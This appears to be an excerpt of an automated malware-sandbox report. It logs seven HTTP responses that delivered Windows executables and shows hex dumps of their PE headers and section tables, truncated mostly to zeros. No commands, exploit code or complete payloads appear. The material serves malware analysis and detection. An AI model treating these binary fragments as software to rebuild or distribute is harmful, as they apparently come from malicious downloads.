Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 03 Sep 2024 15:13:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 03 Sep 2024 15:13:27 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 03 Sep 2024 15:13:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 03 Sep 2024 15:13:30 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 03 Sep 2024 15:13:31 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 03 Sep 2024 15:13:40 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 03 Sep 2024 15:13:40 GMTContent-Type: application/octet-streamContent-Length: 5562368Last-Modified: Sat, 31 Aug 2024 23:00:17 GMTConnection: keep-aliveETag: "66d3a081-54e000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 02 52 00 00 00 00 00 e0 00 02 01 0b 01 03 00 00 a4 24 00 00 6c 08 00 00 00 00 00 00 20 07 00 00 10 00 00 00 b0 4a 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 a0 57 00 00 04 00 00 97 14 55 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 c0 52 00 4c 04 00 00 00 c0 54 00 e9 db 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 52 00 bc dd 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 bc 4a 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 78 a2 24 00 00 10 00 00 00 a4 24 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 64 e4 25 00 00 c0 24 00 00 e6 25 00 00 a8 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 0d 08 00 00 b0 4a 00 00 90 05 00 00 8e 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 4c 04 00 00 00 c0 52 00 00 06 00 00 00 1e 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 bc dd 01 00 00 d0 52 00 00 de 01 00 00 24 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 73 79 6d 74 61 62 00 04 00 00 00 00 b0 54 00 00 02 00 00 00 02 52 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 2e 72 73 72 63 00 00 00 e9 db 02 00 00 c0 54 00 00 dc 02 00 00 04 52 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
